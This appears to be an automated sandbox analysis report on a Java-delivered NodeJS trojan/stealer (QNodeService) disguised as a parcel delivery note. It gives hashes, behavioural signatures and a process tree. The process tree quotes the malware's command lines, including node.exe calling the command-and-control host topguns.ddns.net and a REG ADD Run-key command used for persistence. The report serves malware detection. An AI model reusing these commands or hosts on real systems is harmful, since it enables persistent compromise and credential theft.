Analysis
- max time kernel: 140s
- max time network: 143s
- platform: windows10_x64
- resource: win10
- submitted: 23-10-2020 14:48
- Static task: static1
- Behavioral task: behavioral1 (Sample: Parcel Delivery Note.jar, Resource: win7)
- Behavioral task: behavioral2 (Sample: Parcel Delivery Note.jar, Resource: win10)
General
- Target: Parcel Delivery Note.jar
- Size: 77KB
- MD5: 0d96c82bc640a7304649e294a69b9263
- SHA1: 2a611f879a6e4fa4bf7997392b8735ff6d752c1e
- SHA256: 2a668c8e9f7e67de0b3bb60b71eb701884c98545d2e5b87e4aa97272847bb563
- SHA512: 487a6b6c4142d154030b26a25a8ae43876f7cde9de3465bae3ab95de00920e958c2ff78e6923cca35e9e06dbf1731f980e039bcb26553a4e950f8e621f1be6ed
Malware Config
Signatures
- QNodeService
  Trojan/stealer written in NodeJS and spread via Java downloader.
- Executes dropped EXE (3 IoCs)
  pid  | Process
  2872 | node.exe
  3508 | node.exe
  1684 | node.exe
- Loads dropped DLL (6 IoCs)
  pid  | Process
  1684 | node.exe (6 entries)
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
- Adds Run key to start application (2 TTPs, 2 IoCs)
  description     | ioc | Process
  Key created     | \REGISTRY\USER\S-1-5-21-2627584638-3284755310-3019450177-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | reg.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-2627584638-3284755310-3019450177-1000\Software\Microsoft\Windows\CurrentVersion\Run\b5e57052-91ea-4f36-bc1e-e1f4b566b61c = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\"" | reg.exe
- JavaScript code in executable (3 IoCs)
  resource | yara_rule
  behavioral2/files/0x000100000001ab66-174.dat | js
  behavioral2/files/0x000100000001ab66-178.dat | js
  behavioral2/files/0x000100000001ab66-182.dat | js
- Looks up external IP address via web service (2 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  flow | ioc
  22   | wtfismyip.com
  23   | wtfismyip.com
- Checks processor information in registry (2 TTPs, 6 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  description       | ioc | Process
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | node.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | node.exe
  Key opened        | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 | node.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz | node.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString | node.exe
  Key opened        | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | node.exe
- Suspicious behavior: EnumeratesProcesses (18 IoCs)
  pid  | Process
  2872 | node.exe (4 entries)
  3508 | node.exe (4 entries)
  1684 | node.exe (10 entries)
- Suspicious use of WriteProcessMemory (12 IoCs)
  description                         | pid  | Process   | procid_target
  PID 3996 wrote to memory of 812     | 3996 | java.exe  | 75
  PID 3996 wrote to memory of 812     | 3996 | java.exe  | 75
  PID 812 wrote to memory of 2872     | 812  | javaw.exe | 76
  PID 812 wrote to memory of 2872     | 812  | javaw.exe | 76
  PID 2872 wrote to memory of 3508    | 2872 | node.exe  | 78
  PID 2872 wrote to memory of 3508    | 2872 | node.exe  | 78
  PID 3508 wrote to memory of 1684    | 3508 | node.exe  | 79
  PID 3508 wrote to memory of 1684    | 3508 | node.exe  | 79
  PID 1684 wrote to memory of 1076    | 1684 | node.exe  | 81
  PID 1684 wrote to memory of 1076    | 1684 | node.exe  | 81
  PID 1076 wrote to memory of 632     | 1076 | cmd.exe   | 82
  PID 1076 wrote to memory of 632     | 1076 | cmd.exe   | 82
Processes (process tree, indented by depth)
- C:\ProgramData\Oracle\Java\javapath\java.exe
  Command line: java -jar "C:\Users\Admin\AppData\Local\Temp\Parcel Delivery Note.jar"
  - Suspicious use of WriteProcessMemory
  PID: 3996
  - C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe
    Command line: "C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\e95b14f5.tmp
    - Suspicious use of WriteProcessMemory
    PID: 812
    - C:\Users\Admin\node-v14.12.0-win-x64\node.exe
      Command line: C:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain topguns.ddns.net
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of WriteProcessMemory
      PID: 2872
      - C:\Users\Admin\node-v14.12.0-win-x64\node.exe
        Command line: C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_rN7cuj\boot.js --hub-domain topguns.ddns.net
        - Executes dropped EXE
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of WriteProcessMemory
        PID: 3508
        - C:\Users\Admin\node-v14.12.0-win-x64\node.exe
          Command line: C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_rN7cuj\boot.js --hub-domain topguns.ddns.net
          - Executes dropped EXE
          - Loads dropped DLL
          - Checks processor information in registry
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of WriteProcessMemory
          PID: 1684
          - C:\Windows\system32\cmd.exe
            Command line: C:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "b5e57052-91ea-4f36-bc1e-e1f4b566b61c" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""
            - Suspicious use of WriteProcessMemory
            PID: 1076
            - C:\Windows\system32\reg.exe
              Command line: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "b5e57052-91ea-4f36-bc1e-e1f4b566b61c" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""
              - Adds Run key to start application
              PID: 632